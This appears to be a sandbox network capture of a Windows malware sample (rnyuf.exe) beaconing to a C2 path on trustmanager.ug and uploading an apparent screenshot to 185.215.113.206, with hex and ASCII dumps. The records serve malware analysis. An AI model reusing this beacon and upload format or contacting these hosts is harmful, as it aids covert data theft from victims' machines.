Aug 23, 2021 02:09:05.450229883 CEST	16501	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:05.476325035 CEST	16520	OUT	Data Raw: c1 35 d7 1d 06 c2 4f b9 2e 3f 1a 85 fc 30 a7 fd 5c c0 d5 7d 76 9b dc 4f 2c ac b6 39 9e 69 c0 1a dd 7f 0d dc af dd 21 aa bb e8 97 89 ff 00 2c b3 f4 aa 58 9a 6f 66 43 c1 56 8e e8 cc 5e b8 a7 e2 ac b6 9f 70 9d 61 61 f8 53 0c 32 0e a8 47 e1 55 ed 22 Data Ascii: 5O.?0\}vO,9i!,XofCV^paaS2GU"b3[03R6JhJ-Sr@)@e()SK- G]G5 v=4\G:g4Qp:P(u'zZ(AE-u_%ga[HmzS<aq
Aug 23, 2021 02:09:05.476744890 CEST	16528	OUT	Data Raw: f0 ca e5 6f 4f fd 33 fe 86 b1 cf de 35 b9 e1 65 ca 5f ff 00 d7 3f e8 6b 0f f8 8f d6 b9 29 3f df 4f e4 6b 5b f8 51 0a 5a 4a 05 74 9c 63 85 14 0a 28 10 b4 a2 9b 4b 48 07 51 49 4b 48 90 a5 ef 49 45 02 16 96 92 8a 40 38 52 d2 76 a3 b5 21 0e a5 14 da Data Ascii: oO35e_?k)?Ok[QZJtc(KHQIKHIE@8Rv!ZIjgMmyug]}/m<\3Yeut7z"NXr_<d[q8{/j`cMl'#~Ua4mY
Aug 23, 2021 02:09:05.476828098 CEST	16545	OUT	Data Raw: 46 e5 c2 3c ce c7 80 9a 4a fb 5b fb 2f 4f ff 00 9f 0b 5f fb f2 bf e1 49 fd 95 a7 7f d0 3e d3 fe fc af f8 56 1f 59 f2 36 f6 1e 67 c5 74 e1 5f 50 78 bb c0 da 67 8a 2c af 6d 7c a8 ed ee 61 97 36 f2 c6 80 6c 3e 5a 1c 60 76 26 be 6e d6 34 6b dd 07 54 Data Ascii: F<J[/O_I>VY6gt_Pxg,m\|a6l>Z`v&n4kTO4gac[SeRBQZE%-PQ@LIKLANQLBE-!)Pbv(a\@@!)Qx\CciqOiv(F)@'!j@)-;**!wy;R5b
Aug 23, 2021 02:09:05.482218027 CEST	16552	OUT	Data Raw: 69 88 29 45 25 14 08 5a 4a 28 a0 05 a2 92 8a 60 38 51 49 47 34 5c 02 96 92 8a 04 2d 2d 25 14 c0 5a 5a 28 a6 01 4b 49 45 02 16 8a 28 a6 01 46 68 a2 90 06 69 73 4d a0 1a 02 c2 e6 97 34 94 66 98 85 cd 04 d2 66 93 34 87 61 68 cd 21 34 94 5c 07 66 8c Data Ascii: i)E%ZJ(`8QIG4\--%ZZ(KIE(FhisM4ff4ah!4\fhPiI(4df;Lf43IFifEvh.FhX\fL8ni3IW*%%+MFhM'f-Pnh)(R(nhaZJ(
Aug 23, 2021 02:09:05.502717972 CEST	16556	OUT	Data Raw: bf b5 2d 47 3e 43 e1 67 51 fc 9f f0 c1 f6 a8 bc 61 f0 27 5b d1 83 dd 68 2e 75 6b 31 cf 94 17 13 a0 ff 00 77 a3 ff 00 c0 79 f6 ae d3 e1 df c2 0f 0a 36 9f 06 af 79 71 fd b7 39 3c c7 22 14 8a 17 1d 51 a3 3c ee 1d 08 6f ca 95 c0 f9 da e2 da 7b 3b 89 Data Ascii: -G>CgQa'[h.uk1wy6yq9<"Q<o{;-a;^9T) *:~1E5# P pBt]%{$YxfqZ}3+fVz`hIZV7Xt^]xNd fu'?!V0
Aug 23, 2021 02:09:05.531025887 CEST	16558	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:05.531058073 CEST	16559	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.3	49811	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:05.583051920 CEST	16560	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:05.608669043 CEST	16574	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:05.608686924 CEST	16575	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.3	49810	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:05.594502926 CEST	16560	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:05.594676971 CEST	16560	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:05.594907045 CEST	16570	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:05.595065117 CEST	16573	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:05.650681973 CEST	16577	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:05.650854111 CEST	16585	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:05.650940895 CEST	16595	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:05.650969028 CEST	16600	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:05.708276033 CEST	16603	OUT	Data Raw: c1 35 d7 1d 06 c2 4f b9 2e 3f 1a 85 fc 30 a7 fd 5c c0 d5 7d 76 9b dc 4f 2c ac b6 39 9e 69 c0 1a dd 7f 0d dc af dd 21 aa bb e8 97 89 ff 00 2c b3 f4 aa 58 9a 6f 66 43 c1 56 8e e8 cc 5e b8 a7 e2 ac b6 9f 70 9d 61 61 f8 53 0c 32 0e a8 47 e1 55 ed 22 Data Ascii: 5O.?0\}vO,9i!,XofCV^paaS2GU"b3[03R6JhJ-Sr@)@e()SK- G]G5 v=4\G:g4Qp:P(u'zZ(AE-u_%ga[HmzS<aq
Aug 23, 2021 02:09:05.708316088 CEST	16606	OUT	Data Raw: 31 d4 2c 6f 0d 9d c2 db 5d 25 b1 93 30 3b 06 2a 1b 7a 28 20 ed 6e 57 23 8f a5 58 b7 f0 83 4f ae 4d a2 b6 b7 a5 43 a8 c5 33 c2 61 90 5c 7f 0f 25 b7 2c 45 42 e0 13 92 46 00 39 c5 5f f1 5e ab a3 6b f3 df c2 da e6 9c 63 bb d4 16 e2 d6 68 2c 66 84 5b Data Ascii: 1,o]%0;z( nW#XOMC3a\%,EBF9_^kch,f[n3LrN~e+CG/+bD"+Zg1skbnu}?K+]&B]kMd{x@%N7\U[e]M'<p ji-7mo4wlQ;$
Aug 23, 2021 02:09:05.708327055 CEST	16608	OUT	Data Raw: 44 f2 b2 5a 51 51 07 1e b4 ed e3 d6 aa e8 56 63 e8 c5 37 78 f5 a3 78 f5 a7 74 2b 31 69 0f 5a 6e f1 9e b4 16 1e b5 37 43 b3 16 8a 66 e1 eb 46 f0 68 ba 1d 98 fa 51 4c dc 3d 69 41 1e b4 5d 0a cc 7d 14 99 1e b4 64 7a d3 ba 15 87 51 8a 68 23 d6 82 c3 Data Ascii: DZQQVc7xxt+1iZn7CfFhQL=iA]}dzQh#XqFi]J&Lw&ER3@<RAL4` K( SbE#-6)MQ,x4i!8SDL#J1jA%-&h&E&iE)*
Aug 23, 2021 02:09:06.405539036 CEST	16671	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.3	49812	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:05.740489006 CEST	16628	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:05.766541958 CEST	16657	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 